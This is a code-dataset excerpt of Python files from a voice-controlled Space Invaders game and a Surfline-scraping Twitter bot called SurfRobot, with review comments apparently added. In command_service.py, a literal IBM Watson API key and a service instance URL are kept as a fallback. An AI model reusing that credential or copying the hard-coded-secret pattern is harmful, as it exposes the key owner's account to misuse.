index int64 | repo_name string | branch_name string | path string | content string | import_graph string |
|---|---|---|---|---|---|
53,402 | akarishiraj/Voice-Controlled-Game-Space-Invader | refs/heads/master | /configuration.py | #congiguration
MUSIC_PATH = "music/"
IMG_PATH = "images/"
EXPLOSION_SOUND = MUSIC_PATH+"explosion.wav"
BULLET_SOUND = MUSIC_PATH+"laser.wav"
BACKGROUND_WAV = MUSIC_PATH+"background.wav"
FONT_PATH = 'freesansbold.ttf'
BULLET_PNG = IMG_PATH+"bullet.png"
ENEMY_PNG = IMG_PATH+'enemy.png'
ICON = IMG_PATH+"periscope.png"
BACKGROUND = IMG_PATH+"background.png"
PLAYER_PNG = IMG_PATH+"player.png"
PX = 370
PY = 480
CAPTION = "Space Invaders"
SCREEN_HEIGHT = 600
SCREEN_WIDTH = 800
| {"/keyboard_game.py": ["/configuration.py"]} |
53,403 | akarishiraj/Voice-Controlled-Game-Space-Invader | refs/heads/master | /command_service.py | from ibm_watson import SpeechToTextV1
from ibm_cloud_sdk_core.authenticators import IAMAuthenticator
def activate():
    """Create and return an authenticated IBM Watson SpeechToTextV1 client.

    Returns:
        SpeechToTextV1: client pointed at the us-east service instance.
    """
    import os  # local import; keeps the module's import block untouched

    # SECURITY FIX: the API key used to be hard-coded only. Prefer the
    # IBM_SPEECH_TO_TEXT_APIKEY environment variable; the old literal is
    # kept as a fallback so existing deployments keep working, but it
    # should be rotated and removed from source control.
    api_key = os.getenv("IBM_SPEECH_TO_TEXT_APIKEY",
                        'yTSSJ5GSmGhgIA95KnVPDf61KSZinztq909UBMfoqh7l')
    authenticator = IAMAuthenticator(api_key)
    speech_to_text = SpeechToTextV1(authenticator=authenticator)
    speech_to_text.set_service_url(
        "https://api.us-east.speech-to-text.watson.cloud.ibm.com/instances/77c94867-643f-431b-a593-0bc775c18bb7")
    return speech_to_text
def stop(stream, audio, audio_source):
    """Tear down the audio capture pipeline.

    Stops and closes the PyAudio stream, terminates the PyAudio instance,
    and signals the audio source that recording has completed. Any failure
    during teardown is reported to stdout rather than raised.
    """
    teardown = ((stream, "stop_stream"),
                (stream, "close"),
                (audio, "terminate"),
                (audio_source, "completed_recording"))
    try:
        for target, method_name in teardown:
            getattr(target, method_name)()
    except Exception as e:
        print("ERROR")
        print(e)
| {"/keyboard_game.py": ["/configuration.py"]} |
53,404 | akarishiraj/Voice-Controlled-Game-Space-Invader | refs/heads/master | /keyboard_game.py | import pygame
import random
import math
from pygame import mixer
from configuration import *
from command import *
# initialize the pygame
pygame.init()

# create the screen
screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))  # width, height or x,y axis

# Background
background = pygame.image.load(BACKGROUND)

# BUG FIX: this was `running = False`, which made the `while running:` game
# loop below a no-op, so the game exited immediately after startup. The
# keyboard-driven game should start in the running state.
running = True

# title and icons
pygame.display.set_caption(CAPTION)
icon = pygame.image.load(ICON)
pygame.display.set_icon(icon)

# Player sprite and starting position (PX/PY from configuration)
playerImg = pygame.image.load(PLAYER_PNG)
playerX = PX
playerY = PY
playerX_change = 0

# Enemies: parallel lists of sprite / position / per-frame velocity
enemyImg = []
enemyX = []
enemyY = []
enemyX_change = []
enemyY_change = []
num_of_enemies = 6
for i in range(num_of_enemies):
    enemyImg.append(pygame.image.load(ENEMY_PNG))
    enemyX.append(random.randint(0, 736))
    enemyY.append(random.randint(50, 150))
    enemyX_change.append(4)    # horizontal speed
    enemyY_change.append(40)   # vertical drop when an edge is hit

# Bullet
bulletImg = pygame.image.load(BULLET_PNG)
bulletX = 0
bulletY = PY  # coordinate of spaceship
bulletX_change = 0
bulletY_change = 10
# "ready" - you can't see the bullet on screen
# "fire"  - the bullet is moving
bullet_state = "ready"

# Score
score_value = 0
font = pygame.font.Font(FONT_PATH, 32)
textX = 10
textY = 10

# Game Over
over_font = pygame.font.Font(FONT_PATH, 64)
def game_over_text():
    """Render the 'GAME OVER' banner onto the global screen surface."""
    banner = over_font.render("GAME OVER", True, (255, 255, 255))
    screen.blit(banner, (200, 250))
def show_score(x, y):
    """Draw the current global score at screen position (x, y)."""
    label = "Score : " + str(score_value)
    rendered = font.render(label, True, (255, 255, 255))
    screen.blit(rendered, (x, y))
def player(x, y):
    """Blit the player's spaceship sprite at (x, y)."""
    position = (x, y)
    screen.blit(playerImg, position)
def enemy(x, y, i):
    """Blit enemy sprite number ``i`` at (x, y); blit draws onto the screen."""
    position = (x, y)
    screen.blit(enemyImg[i], position)
def fire_bullet(x, y):
    """Mark the bullet as in flight and draw it above the spaceship."""
    global bullet_state
    bullet_state = "fire"
    # +16 horizontally so the bullet appears at the center of the spaceship
    screen.blit(bulletImg, (x + 16, y + 10))
def isCollision(enemyX, enemyY, bulletX, bulletY):
    """Return True when the bullet is within 25 px of the enemy.

    Computes the Euclidean distance between the enemy and bullet
    positions; 25 px is the effective hit radius for the sprites.
    """
    # math.hypot replaces the previous sqrt(pow(..) + pow(..)) construction
    # and the redundant `if dist < 25: return True / else: return False`.
    return math.hypot(enemyX - bulletX, enemyY - bulletY) < 25
try:
    # Background sound (loops forever)
    mixer.music.load(BACKGROUND_WAV)
    mixer.music.play(-1)

    # game loop
    while running:
        # RGB - red, green and blue
        screen.fill((0, 0, 0))
        # background image
        screen.blit(background, (0, 0))

        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                running = False
            # if keystroke is pressed check whether right or left
            if event.type == pygame.KEYDOWN:  # KEYDOWN means any key is pressed
                if event.key == pygame.K_LEFT:
                    playerX_change = -5
                if event.key == pygame.K_RIGHT:
                    playerX_change = 5
                if event.key == pygame.K_SPACE:
                    # only one bullet may be in flight at a time
                    if bullet_state == "ready":
                        bullet_sound = mixer.Sound(BULLET_SOUND)
                        bullet_sound.play()
                        bulletX = playerX
                        fire_bullet(bulletX, bulletY)
            if event.type == pygame.KEYUP:  # when key is released
                if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:
                    playerX_change = 0

        playerX += playerX_change
        # keep the player inside the 800-wide screen (sprite is 64 px wide)
        if playerX <= 0:
            playerX = 0
        elif playerX >= 736:
            playerX = 736

        for i in range(num_of_enemies):
            # an enemy below y=440 has reached the player: game over
            if enemyY[i] > 440:
                for j in range(num_of_enemies):
                    enemyY[j] = 2000  # park all enemies off-screen
                game_over_text()
                break
            enemyX[i] += enemyX_change[i]
            # bounce off screen edges and step down one row
            if enemyX[i] <= 0:
                enemyX_change[i] = 4
                enemyY[i] += enemyY_change[i]
            elif enemyX[i] >= 736:
                enemyX_change[i] = -4
                enemyY[i] += enemyY_change[i]
            collision = isCollision(enemyX[i], enemyY[i], bulletX, bulletY)
            if collision:
                collision_sound = mixer.Sound(EXPLOSION_SOUND)
                collision_sound.play()
                # reset the bullet and respawn the enemy at the top
                bulletY = PY
                bullet_state = "ready"
                score_value += 1
                print(score_value)
                enemyX[i] = random.randint(0, 735)
                enemyY[i] = random.randint(50, 150)
            enemy(enemyX[i], enemyY[i], i)

        # bullet movement: reset once it leaves the top of the screen
        if bulletY <= 0:
            bulletY = PY
            bullet_state = "ready"
        # BUG FIX: was `bullet_state is "fire"` — identity comparison against
        # a string literal (works only via CPython interning and raises a
        # SyntaxWarning on modern Pythons); use equality.
        if bullet_state == "fire":
            fire_bullet(bulletX, bulletY)
            bulletY -= bulletY_change

        # player must be drawn after screen.fill so it appears on top
        player(playerX, playerY)
        show_score(textX, textY)
        pygame.display.update()
except Exception as e:
    print("game closed")
    # previously the exception was swallowed silently; print it so crashes
    # are diagnosable
    print(e)
| {"/keyboard_game.py": ["/configuration.py"]} |
53,421 | colestriler/SurfRobot | refs/heads/master | /flaskapp/models.py | from datetime import datetime
from flaskapp import db
class Report(db.Model):
    """A single surf report scraped from Surfline for one location."""
    id = db.Column(db.Integer, primary_key=True)
    # BUG FIX: this was `default=datetime.now()`, which is evaluated once at
    # import time, stamping every row with the same moment. Passing the
    # callable makes SQLAlchemy evaluate it per insert.
    date = db.Column(db.DateTime, nullable=False, default=datetime.now)
    location = db.Column(db.String(), nullable=False)
    condition = db.Column(db.String(), nullable=False)
    wave_height = db.Column(db.String(), nullable=False)
    tide = db.Column(db.String(), nullable=False)
    wind = db.Column(db.String(), nullable=False)
    swells = db.Column(db.String(), nullable=True)
    weather = db.Column(db.String(), nullable=False)
    h20_temp = db.Column(db.String(), nullable=False)
    # first_light = db.Column(db.DateTime, nullable=True)
    # last_light = db.Column(db.DateTime, nullable=True)

    def __repr__(self):
        return f"Report('{self.id}', '{self.date}', '{self.location}', '{self.condition}', '{self.wave_height}', '{self.tide}', '{self.wind}', '{self.swells}', '{self.weather}', '{self.h20_temp}')"
| {"/flaskapp/models.py": ["/flaskapp/__init__.py"], "/flaskapp/bots/follow_users.py": ["/flaskapp/bots/config_class.py"], "/clock.py": ["/flaskapp/bots/create_tweet.py", "/flaskapp/bots/follow_users.py"], "/flaskapp/bots/create_tweet.py": ["/flaskapp/bots/collect_data.py", "/flaskapp/__init__.py", "/flaskapp/models.py", "/flaskapp/bots/config_class.py"], "/flaskapp/__init__.py": ["/flaskapp/bots/app.py"]} |
53,422 | colestriler/SurfRobot | refs/heads/master | /flaskapp/bots/collect_data.py | import bs4
from urllib.request import urlopen as uReq
from bs4 import BeautifulSoup as soup
import pandas as pd
import numpy as np
import re
import datetime
import requests
# Surfline spot-report URLs (San Diego / Orange County area). The trailing
# path segment of each URL is the spot id consumed by get_surf_data().
tmp_url = "https://www.surfline.com/surf-report/terra-mar-point/5842041f4e65fad6a77088a6"
tamarack = 'https://www.surfline.com/surf-report/tamarack/5842041f4e65fad6a7708837'
oside_pier_south_url = "https://www.surfline.com/surf-report/oceanside-pier-southside/584204204e65fad6a7709435"
oside_pier_north_url = "https://www.surfline.com/surf-report/oceanside-pier-northside/5842041f4e65fad6a7708835"
oside_harbor_north_url = "https://www.surfline.com/surf-report/oceanside-harbor-north-jetty/5842041f4e65fad6a7708832"
grandview_url = "https://www.surfline.com/surf-report/grandview/5842041f4e65fad6a770889f"
seaside_reef_url = "https://www.surfline.com/surf-report/seaside-reef/5842041f4e65fad6a77088b3"
d_street_url = "https://www.surfline.com/surf-report/d-street/5842041f4e65fad6a77088b7"
la_jolla_url = "https://www.surfline.com/surf-report/la-jolla-shores/5842041f4e65fad6a77088cc"
swamis_url = "https://www.surfline.com/surf-report/swami-s/5842041f4e65fad6a77088b4"
pacific_beach = 'https://www.surfline.com/surf-report/pacific-beach/5842041f4e65fad6a7708841'
beacons = 'https://www.surfline.com/surf-report/beacons/5842041f4e65fad6a77088a0'
moonlight = 'https://www.surfline.com/surf-report/moonlight-state-beach/5842041f4e65fad6a77088a3'
pipes = 'https://www.surfline.com/surf-report/pipes/5c008f5313603c0001df5318'
blacks = 'https://www.surfline.com/surf-report/blacks/5842041f4e65fad6a770883b'
windansea = 'https://www.surfline.com/surf-report/windansea/5842041f4e65fad6a770883c'
# NOTE(review): la_jolla_shores duplicates la_jolla_url and is not in `urls`.
la_jolla_shores = 'https://www.surfline.com/surf-report/la-jolla-shores/5842041f4e65fad6a77088cc'
tourmaline = 'https://www.surfline.com/surf-report/old-man-s-at-tourmaline/5842041f4e65fad6a77088c4'
torrey_pines = 'https://www.surfline.com/surf-report/torrey-pines-state-beach/584204204e65fad6a7709994'
del_mar = 'https://www.surfline.com/surf-report/del-mar/5d7687fdb4c559000112e666'
san_elijo = 'https://www.surfline.com/surf-report/san-elijo-state-beach/5842041f4e65fad6a77088b8'
trails = "https://www.surfline.com/surf-report/trails/5842041f4e65fad6a7708885"
the_point = "https://www.surfline.com/surf-report/the-point-at-san-onofre/5842041f4e65fad6a7708831"
upper_trestles = "https://www.surfline.com/surf-report/upper-trestles/5842041f4e65fad6a7708887"
lower_trestles = "https://www.surfline.com/surf-report/lower-trestles/5842041f4e65fad6a770888a"
san_onofre = "https://www.surfline.com/surf-report/san-onofre-state-beach/584204204e65fad6a77099d4"

# All spots scraped by get_surf_data(), roughly alphabetical.
urls = [
    beacons,
    blacks,
    d_street_url,
    del_mar,
    grandview_url,
    la_jolla_url,
    moonlight,
    oside_harbor_north_url,
    oside_pier_north_url,
    oside_pier_south_url,
    pacific_beach,
    pipes,
    san_elijo,
    san_onofre,
    seaside_reef_url,
    swamis_url,
    tamarack,
    the_point,
    tmp_url,
    torrey_pines,
    tourmaline,
    trails,
    upper_trestles,
    lower_trestles,
    windansea
]
def get_surf_data():
    """Scrape current surf conditions for every URL in ``urls``.

    Returns:
        dict: location name -> dict with keys 'condition', 'wave_height',
        'tide', 'wind', 'weather', 'H20temp', 'first_light', 'last_light'.

    NOTE(review): the scraping below depends on Surfline's exact DOM
    (CSS class names and chains of ``next_element``) and on an internal,
    undocumented API endpoint; any markup change will break it silently.
    """
    dictionary = {}
    for url in urls:
        data = {}
        url_page = requests.get(url)
        url_soup = soup(url_page.text, "html.parser")
        # page <h1> is "<Location> Report & Forecast" -> keep the location
        url_loc = url_soup.h1.text.replace(" Report & Forecast", "")
        # current conditions (i.e. top table on website)
        current_cond = url_soup.find("div", {"class": "quiver-spot-report"})
        url_cond = current_cond.div.text.lower()
        data['condition'] = url_cond
        # takes current wave height
        current_height = url_soup.find("span", {"class": "quiver-surf-height"})
        url_height = current_height.text.lower()
        data['wave_height'] = url_height
        # takes current tide
        current_tide = url_soup.find("div", {
            "class": "quiver-spot-forecast-summary__stat-container quiver-spot-forecast-summary__stat-container--tide"})
        url_tide = current_tide.next_element.next_element.next_element.text
        data['tide'] = url_tide
        # takes wind speed
        current_wind = url_soup.find("div", {
            "class": "quiver-spot-forecast-summary__stat-container quiver-spot-forecast-summary__stat-container--wind"})
        url_wind = current_wind.next_element.next_element.next_element.text
        data['wind'] = url_wind
        # # swells
        # data['swells'] = [swells_line_1, swells_line_2, swells_line_3]
        # outside (air) temperature
        current_weather = url_soup.find("div", {"class": "quiver-weather-stats"})
        url_weather = current_weather.next_element.next_element.next_element.next_element.next_element
        data['weather'] = url_weather
        # water temp: low and high ends of the reported range
        current_H20temp = url_soup.find("div", {"class": "quiver-water-temp"})
        H20temp1 = current_H20temp.next_element.next_element.next_element.next_element.next_element
        H20temp2 = current_H20temp.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element
        data['H20temp'] = H20temp1 + "-" + H20temp2
        # ----------------- API --------------------
        # WEATHER DATA: spot id is the trailing path segment of the report URL
        spot_id = url.split('/')[-1]
        api_url = 'https://services.surfline.com/kbyg/spots/forecasts/weather?spotId={}&days=6&intervalHours=1'.format(spot_id)
        api_data = requests.get(api_url).json()
        # first light — NOTE(review): assumes the API timestamp is in epoch
        # seconds interpreted in the local timezone; confirm against the API.
        first_light_timestamp = api_data['data']['sunlightTimes'][0]['dawn']
        first_light = datetime.datetime.fromtimestamp(first_light_timestamp)
        data['first_light'] = first_light
        # last light
        last_light_timestamp = api_data['data']['sunlightTimes'][0]['dusk']
        last_light = datetime.datetime.fromtimestamp(last_light_timestamp)
        data['last_light'] = last_light
        dictionary[url_loc] = data
    return dictionary
| {"/flaskapp/models.py": ["/flaskapp/__init__.py"], "/flaskapp/bots/follow_users.py": ["/flaskapp/bots/config_class.py"], "/clock.py": ["/flaskapp/bots/create_tweet.py", "/flaskapp/bots/follow_users.py"], "/flaskapp/bots/create_tweet.py": ["/flaskapp/bots/collect_data.py", "/flaskapp/__init__.py", "/flaskapp/models.py", "/flaskapp/bots/config_class.py"], "/flaskapp/__init__.py": ["/flaskapp/bots/app.py"]} |
53,423 | colestriler/SurfRobot | refs/heads/master | /flaskapp/bots/follow_users.py | import tweepy
from flaskapp.bots.config_class import API
# Module-level Twitter client, shared by follow().
api_class = API()
api = api_class.create_api()

# Seed accounts (pro surfers / surf media). Not referenced by the active
# code in this module — kept for the commented-out follower-based strategy.
pro_surfers = ['bethanyhamilton', 'kellyslater',
               'jordysmith88',  # san clemente
               "surfer", "Kai_Lenny", "CaioIbelli", 'nikkivandijk_', '_VicVergara',
               'KSWaveCo', 'cbasszietz']
def follow():
    """Follow up to 30 authors of recent '#surfing' tweets.

    BUG FIX: the previous version tested `num_followed < 30` inside the
    cursor loop but never broke out of it, so after the 30th follow it
    kept paging through the entire search result set (burning rate limit)
    with no effect. We now stop as soon as the quota is reached.
    """
    num_followed = 0
    for tweet in tweepy.Cursor(api.search, q="#surfing").items():
        if num_followed >= 30:
            break
        api.create_friendship(tweet.author.screen_name)
        num_followed += 1
# print(tweet.author.screen_name)
# limit = api.rate_limit_status()
# limit['resources']['followers']['/followers/ids']['remaining']
#
# limit['resources']['followers']['/followers/list']['remaining']
#
# limit['resources']['friendships']
# api.show_friendship(source_id=surfrobot.id, target_id=cole.id)
# (Friendship(_api=<tweepy.api.API object at 0x10cfd0358>, _json={
# 'id': 1184003500247642114,
# 'id_str': '1184003500247642114',
# 'screen_name': 'SurfRobot',
# 'following': True,
# 'followed_by': True,
# 'live_following': False,
# 'following_received': None,
# 'following_requested': None,
# 'notifications_enabled': None,
# 'can_dm': True, 'blocking': None,
# 'blocked_by': None,
# 'muting': None,
# 'want_retweets': None,
# 'all_replies': None,
# 'marked_spam': None},
# id=1184003500247642114, id_str='1184003500247642114', screen_name='SurfRobot', following=True, followed_by=True, live_following=False, following_received=None, following_requested=None, notifications_enabled=None, can_dm=True, blocking=None, blocked_by=None, muting=None, want_retweets=None, all_replies=None, marked_spam=None), Friendship(_api=<tweepy.api.API object at 0x10cfd0358>, _json={'id': 2594449783, 'id_str': '2594449783', 'screen_name': 'ColeStriler', 'following': True, 'followed_by': True, 'following_received': None, 'following_requested': None}, id=2594449783, id_str='2594449783', screen_name='ColeStriler', following=True, followed_by=True, following_received=None, following_requested=None))
# surfrobot = api.get_user('surfrobot')
# cole = api.get_user('cole')
# friendship = api.show_friendship(source_id=surfrobot.id, target_id=cole.id)
| {"/flaskapp/models.py": ["/flaskapp/__init__.py"], "/flaskapp/bots/follow_users.py": ["/flaskapp/bots/config_class.py"], "/clock.py": ["/flaskapp/bots/create_tweet.py", "/flaskapp/bots/follow_users.py"], "/flaskapp/bots/create_tweet.py": ["/flaskapp/bots/collect_data.py", "/flaskapp/__init__.py", "/flaskapp/models.py", "/flaskapp/bots/config_class.py"], "/flaskapp/__init__.py": ["/flaskapp/bots/app.py"]} |
53,424 | colestriler/SurfRobot | refs/heads/master | /clock.py | import os
from apscheduler.schedulers.blocking import BlockingScheduler
from flaskapp.bots.create_tweet import tweet
from flaskapp.bots.follow_users import follow
import datetime
sched = BlockingScheduler()

if os.getenv("DEVELOPMENT") == "True":
    # RUN IN DEVELOPMENT: schedule a single smoke-test tweet ~12s from now.
    print("BEFORE TWEET")

    # BUG FIX: previously `second=time.second + 12` was passed straight to
    # the cron trigger, which raises ValueError whenever the current second
    # is >= 48 (cron 'second' must be 0-59). Adding a timedelta rolls the
    # minute/hour over correctly instead.
    run_at = datetime.datetime.now() + datetime.timedelta(seconds=12)

    @sched.scheduled_job('cron', day_of_week='*',
                         hour=run_at.hour,
                         minute=run_at.minute,
                         second=run_at.second)
    def test():
        print("STARTING TWEET")
        tweet()
        print("TWEETED")
else:
    # RUN IN PRODUCTION: morning report + follow pass, afternoon report.
    @sched.scheduled_job('cron', day_of_week='*', hour=10, minute=30)
    def morning():
        tweet()
        follow()

    @sched.scheduled_job('cron', day_of_week='*', hour=16)
    def afternoon():
        tweet()

sched.start()
| {"/flaskapp/models.py": ["/flaskapp/__init__.py"], "/flaskapp/bots/follow_users.py": ["/flaskapp/bots/config_class.py"], "/clock.py": ["/flaskapp/bots/create_tweet.py", "/flaskapp/bots/follow_users.py"], "/flaskapp/bots/create_tweet.py": ["/flaskapp/bots/collect_data.py", "/flaskapp/__init__.py", "/flaskapp/models.py", "/flaskapp/bots/config_class.py"], "/flaskapp/__init__.py": ["/flaskapp/bots/app.py"]} |
53,425 | colestriler/SurfRobot | refs/heads/master | /flaskapp/bots/create_tweet.py | import os
from datetime import datetime
import calendar
from flaskapp.bots.collect_data import get_surf_data
import time
import secrets
from flaskapp import create_app, db
from flaskapp.models import Report
from flaskapp.bots.config_class import API
import tweepy
# Shared Twitter client for this module.
api_class = API()
api = api_class.create_api()

# NOTE(review): this scrape runs at import time, so merely importing this
# module performs one network request per spot. Consider moving it inside
# tweet().
surf_data = get_surf_data()

# Parallel lists: locations[i] describes datas[i].
locations = []
datas = []
for location, data in surf_data.items():
    locations.append(location)
    datas.append(data)
length_locations = len(locations)
def tweet():
    """Post a threaded surf report (one tweet per location) and persist a
    Report row per location to the database.
    """
    # DELETE ALL PREVIOUS TWEETS IF USING TESTING ACOUNT
    # if api_class.delete_all:
    #     for status in tweepy.Cursor(api.user_timeline).items():
    #         api.destroy_status(status.id)
    today = datetime.today()
    dow = calendar.day_name[today.weekday()]
    now = datetime.now()
    current_time = now.strftime("%H:%M")
    reports = []
    # NOTE(review): `time` here shadows the module-level `import time`.
    if today.hour <= 12:
        time = "Morning"
    else:
        time = "Afternoon"
    first_tweet = f"""🏄🏽♂️ {time} surf report for {dow} at {current_time}:
    """
    api.update_status(first_tweet)
    for i in range(length_locations):
        # Reply to our own most recent tweet so the reports form a thread.
        # NOTE(review): refetches the timeline (and api.me()) every
        # iteration; the status returned by update_status could be reused.
        previous_tweet = api.user_timeline(id=api.me().id, count=1)[0]
        # condition -> emoji marker
        if datas[i]['condition'] == "poor":
            cond_emoji = "❌"
        elif datas[i]['condition'] == "poor to fair":
            cond_emoji = "⚠️"
        else:
            cond_emoji = "✅"
        # NOTE(review): local `tweet` shadows this function's own name.
        tweet = f"""{locations[i]} ({time}):
{cond_emoji}Condition: {datas[i]['condition']}
{"🌊"}Wave height: {datas[i]['wave_height']}
{"🌙"}Tide: {datas[i]['tide']}
{"💨"}Wind: {datas[i]['wind']}
{"🌡"}Water temp: {datas[i]['H20temp']}℉
{"🌞"}Outside Weather: {datas[i]['weather']}℉
{"🌅"}First Light: {datas[i]['first_light'].strftime("%H:%M")}
{"🌌"}Last Light: {datas[i]['last_light'].strftime("%H:%M")}
"""
        # {"🧭"}
        # Swells: {datas[i]['swells'][0]},
        # {datas[i]['swells'][1]}
        api.update_status(tweet, in_reply_to_status_id=previous_tweet.id)
        report = Report(
            date=now,
            location=locations[i],
            condition=datas[i]['condition'],
            wave_height=datas[i]['wave_height'],
            tide=datas[i]['tide'],
            wind=datas[i]['wind'],
            # swells = db.Column(db.String(), nullable=True),
            weather=datas[i]['weather'],
            h20_temp=datas[i]['H20temp']
        )
        reports.append(report)
    # Adding To Database
    app = create_app()
    with app.app_context():
        # ctx.push()
        for report in reports:
            db.session.add(report)
        db.session.commit()
        # ctx.pop()
| {"/flaskapp/models.py": ["/flaskapp/__init__.py"], "/flaskapp/bots/follow_users.py": ["/flaskapp/bots/config_class.py"], "/clock.py": ["/flaskapp/bots/create_tweet.py", "/flaskapp/bots/follow_users.py"], "/flaskapp/bots/create_tweet.py": ["/flaskapp/bots/collect_data.py", "/flaskapp/__init__.py", "/flaskapp/models.py", "/flaskapp/bots/config_class.py"], "/flaskapp/__init__.py": ["/flaskapp/bots/app.py"]} |
53,426 | colestriler/SurfRobot | refs/heads/master | /flaskapp/bots/waves.py | import bs4
from urllib.request import urlopen as uReq
from bs4 import BeautifulSoup as soup
import pandas as pd
import numpy as np
import re
import requests
""" I made this project to learn web scraping. This is my first project using BeautifulSoup and I plan on optimizing
my code as I continue to learn the software."""
# Surfline report URLs used by the legacy Report scraper below.
tmp_url = "https://www.surfline.com/surf-report/terra-mar-point/5842041f4e65fad6a77088a6"
oside_pier_south_url = "https://www.surfline.com/surf-report/oceanside-pier-southside/584204204e65fad6a7709435"
oside_pier_north_url = "https://www.surfline.com/surf-report/oceanside-pier-northside/5842041f4e65fad6a7708835"
oside_harbor_url = "https://www.surfline.com/surf-report/oceanside-harbor-north-jetty/5842041f4e65fad6a7708832"
grandview_url = "https://www.surfline.com/surf-report/grandview/5842041f4e65fad6a770889f"
seaside_reef_url = "https://www.surfline.com/surf-report/seaside-reef/5842041f4e65fad6a77088b3"
d_street_url = "https://www.surfline.com/surf-report/d-street/5842041f4e65fad6a77088b7"
la_jolla_url = "https://www.surfline.com/surf-report/la-jolla-shores/5842041f4e65fad6a77088cc"
swamis_url = "https://www.surfline.com/surf-report/swami-s/5842041f4e65fad6a77088b4"

# NOTE(review): la_jolla_url and seaside_reef_url are defined but not scraped.
urls = [tmp_url, oside_harbor_url, oside_pier_north_url, oside_pier_south_url, swamis_url, grandview_url, d_street_url]
class Report:
    """Scrapes Surfline report pages into a pandas DataFrame and names the
    best spot (lowest wind among spots with 'fair' conditions).

    NOTE(review): relies on Surfline's legacy 'sl-*' CSS classes and on
    regexes over free text; brittle against any site redesign.
    """

    def __init__(self):
        # populated by report_surf(); empty DataFrame until then
        self.waves = pd.DataFrame()

    def report_surf(self):
        """Scrape every URL in ``urls``, build and return ``self.waves``."""
        # making rows for dataframe
        location = np.array([])
        condition = np.array([])
        height = np.array([])
        water_temp = np.array([])
        weather = np.array([])
        tide = np.array([])
        wind = np.array([])
        for url in urls:
            # Opening up connection, grabbing the page
            url_page = requests.get(url)
            # html parser
            url_soup = soup(url_page.text, "html.parser")
            # e.g. 'Terra Mar Point Surf'
            url_loc = url_soup.h1.text.replace(" Report & Forecast", "")
            # current conditions (i.e. top table on website)
            current_cond = url_soup.find("div", {"class": "sl-spot-report"})
            url_cond = current_cond.div.text.lower()
            # len(url_data) == 4
            url_data = url_soup.findAll("div", {"class": "sl-spot-forecast-summary__stat"})
            # takes current wave height
            pattern = '[0-9]+-[0-9]+FT'
            url_height = re.findall(pattern, url_data[0].text)[0].replace("FT", " FT")
            # takes current tide
            pattern = "[0-9].[0-9]+FT"
            url_tide = re.findall(pattern, url_data[1].text)[0].replace("FT", " FT")
            # takes wind speed
            pattern = '[0-9]+[A-Z]+'
            url_wind = re.findall(pattern, url_data[2].text)[0].replace("KTS", " ")
            # outside temp
            pattern = '[0-9]+ ºF'
            url_weather = url_soup.find("div", {"class": "sl-wetsuit-recommender__conditions__weather"}).text
            url_weather = re.findall(pattern, url_weather)[0]
            # use for water temp
            wetsuit = url_soup.find("div", {"class": "sl-wetsuit-recommender__conditions"})
            # water temp
            pattern = '[0-9]+ - [0-9]+ ºF'
            H20temp = re.findall(pattern, wetsuit.div.text)[0]
            # columns for DataFrame (re-assigned each pass; loop-invariant)
            columns = np.array(["location", "condition", "wave height", "H20temp", "weather", "tide", "wind"])
            # making rows for DataFrame
            location = np.append(location, url_loc)
            condition = np.append(condition, url_cond)
            height = np.append(height, url_height)
            water_temp = np.append(water_temp, H20temp)
            weather = np.append(weather, url_weather)
            # sunrise = np.array([1])
            # sunset = np.array([1])
            tide = np.append(tide, url_tide)
            wind = np.append(wind, url_wind)
        # making dataframe
        report = pd.DataFrame(columns=columns)
        report['location'] = location
        report['condition'] = condition
        report['wave height'] = height
        report['H20temp'] = water_temp
        report['weather'] = weather
        # report['sunrise'] = sunrise
        # report['sunset'] = sunset
        report['tide'] = tide
        report['wind'] = wind
        self.waves = report
        # return the DataFrame
        return report

    def best(self):
        """Return a message naming the lowest-wind 'fair' spot, if any.

        NOTE(review): mutates ``self.waves['wind']`` in place (string ->
        int), so a second call will likely fail on the regex — verify.
        """
        if self.waves.size == 0:
            return "Need to run .report_surf() first."
        if len(self.waves[self.waves['condition'] == 'fair']) > 0:
            # converts wind column to integers
            pattern = "[0-9]"
            self.waves['wind'] = np.array([int(re.findall(pattern, i)[0]) for i in self.waves['wind']])
            # best location has lowest wind
            best_location = self.waves.sort_values('wind', ascending=True).iloc[0, 0]
            return f"The best location is {best_location}."
        else:
            return "There is no good surf today."
# Interactive usage hints. NOTE(review): the scrape below runs at import
# time, so importing this module performs network requests.
print("'r.waves' will display the wave report")
print("'r.best() will show the best surf location (if any).")
print("loading...")
r = Report()
r.report_surf()
| {"/flaskapp/models.py": ["/flaskapp/__init__.py"], "/flaskapp/bots/follow_users.py": ["/flaskapp/bots/config_class.py"], "/clock.py": ["/flaskapp/bots/create_tweet.py", "/flaskapp/bots/follow_users.py"], "/flaskapp/bots/create_tweet.py": ["/flaskapp/bots/collect_data.py", "/flaskapp/__init__.py", "/flaskapp/models.py", "/flaskapp/bots/config_class.py"], "/flaskapp/__init__.py": ["/flaskapp/bots/app.py"]} |
53,427 | colestriler/SurfRobot | refs/heads/master | /flaskapp/__init__.py | from flask import Flask
from flaskapp.config import Config
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
from flask_bcrypt import Bcrypt
# from flask_login import LoginManager
from flask_mail import Mail
# run python run.py
# CREATE EXTENSIONS OUTSIDE OF FUNCTION BUT INITIALIZE INSIDE FUNCTION WITH THE APPLICATION
db = SQLAlchemy()  # represent database structure as classes -> called MODELS
bcrypt = Bcrypt()
# login_manager = LoginManager()
# login_manager.login_view = 'users.login' # telling extension where the login route is located, login is fn name for route
# login_manager.login_message_category = 'info' # blue info alert in bootstrap
mail = Mail()  # initializes extension; bound to the app in create_app()
def create_app(config_class=Config):
    """Application factory: build and configure the Flask app.

    Args:
        config_class: configuration object/class to load (defaults to Config).

    Returns:
        Flask: the configured application with extensions and blueprints bound.
    """
    app = Flask(__name__)  # __name__ is this module's import name
    # BUG FIX: previously hard-coded `Config` here, silently ignoring the
    # `config_class` argument (e.g. a test configuration passed by a caller).
    app.config.from_object(config_class)

    # bind the module-level extensions to this application instance
    db.init_app(app)
    bcrypt.init_app(app)
    # login_manager.init_app(app)
    mail.init_app(app)

    # REGISTER BLUEPRINTS (imported here to avoid a circular import)
    from flaskapp.bots.app import bots
    app.register_blueprint(bots)

    return app
